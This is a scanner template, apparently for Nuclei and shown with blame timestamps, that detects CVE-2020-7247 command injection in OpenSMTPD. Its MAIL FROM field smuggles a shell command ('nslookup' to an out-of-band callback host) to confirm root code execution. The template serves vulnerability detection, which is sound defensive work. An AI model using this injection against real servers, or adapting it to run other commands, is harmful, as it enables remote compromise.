2021-04-18 14:45:41 +00:00
id : CVE-2020-7247
2022-04-07 13:53:15 +00:00
2021-04-18 14:45:41 +00:00
info :
2022-04-29 19:58:07 +00:00
name : OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution
2021-04-18 14:45:41 +00:00
author : princechaddha
severity : critical
2022-04-29 19:58:07 +00:00
description : |
OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.
2022-04-07 13:53:15 +00:00
reference :
- https://www.openwall.com/lists/oss-security/2020/01/28/3
- https://nvd.nist.gov/vuln/detail/CVE-2020-7247
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-7247
cwe-id : CWE-78,CWE-755
2022-04-07 13:53:15 +00:00
tags : cve,cve2020,smtp,opensmtpd,network,rce,oast
2021-04-18 14:45:41 +00:00
network :
- inputs :
- read : 1024
- data : "helo target\r\n"
read : 1024
- data : "MAIL FROM:<;nslookup {{interactsh-url}};>\r\n"
read : 1024
- data : "RCPT TO:<root>\r\n"
read : 1024
- data : "DATA\r\n"
read : 1024
- data : "\r\nxxxx\r\n.\r\n"
read : 1024
- data : "QUIT\r\n"
read : 1024
host :
- "{{Hostname}}"
2022-01-07 07:28:37 +00:00
- "{{Host}}:25"
2021-04-18 14:45:41 +00:00
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol
words :
- "dns"
- type : word
part : raw
2021-04-18 14:48:32 +00:00
words :
2022-04-07 13:53:15 +00:00
- "Message accepted for delivery"
2022-04-29 19:58:07 +00:00
# Enhanced by mp on 2022/04/29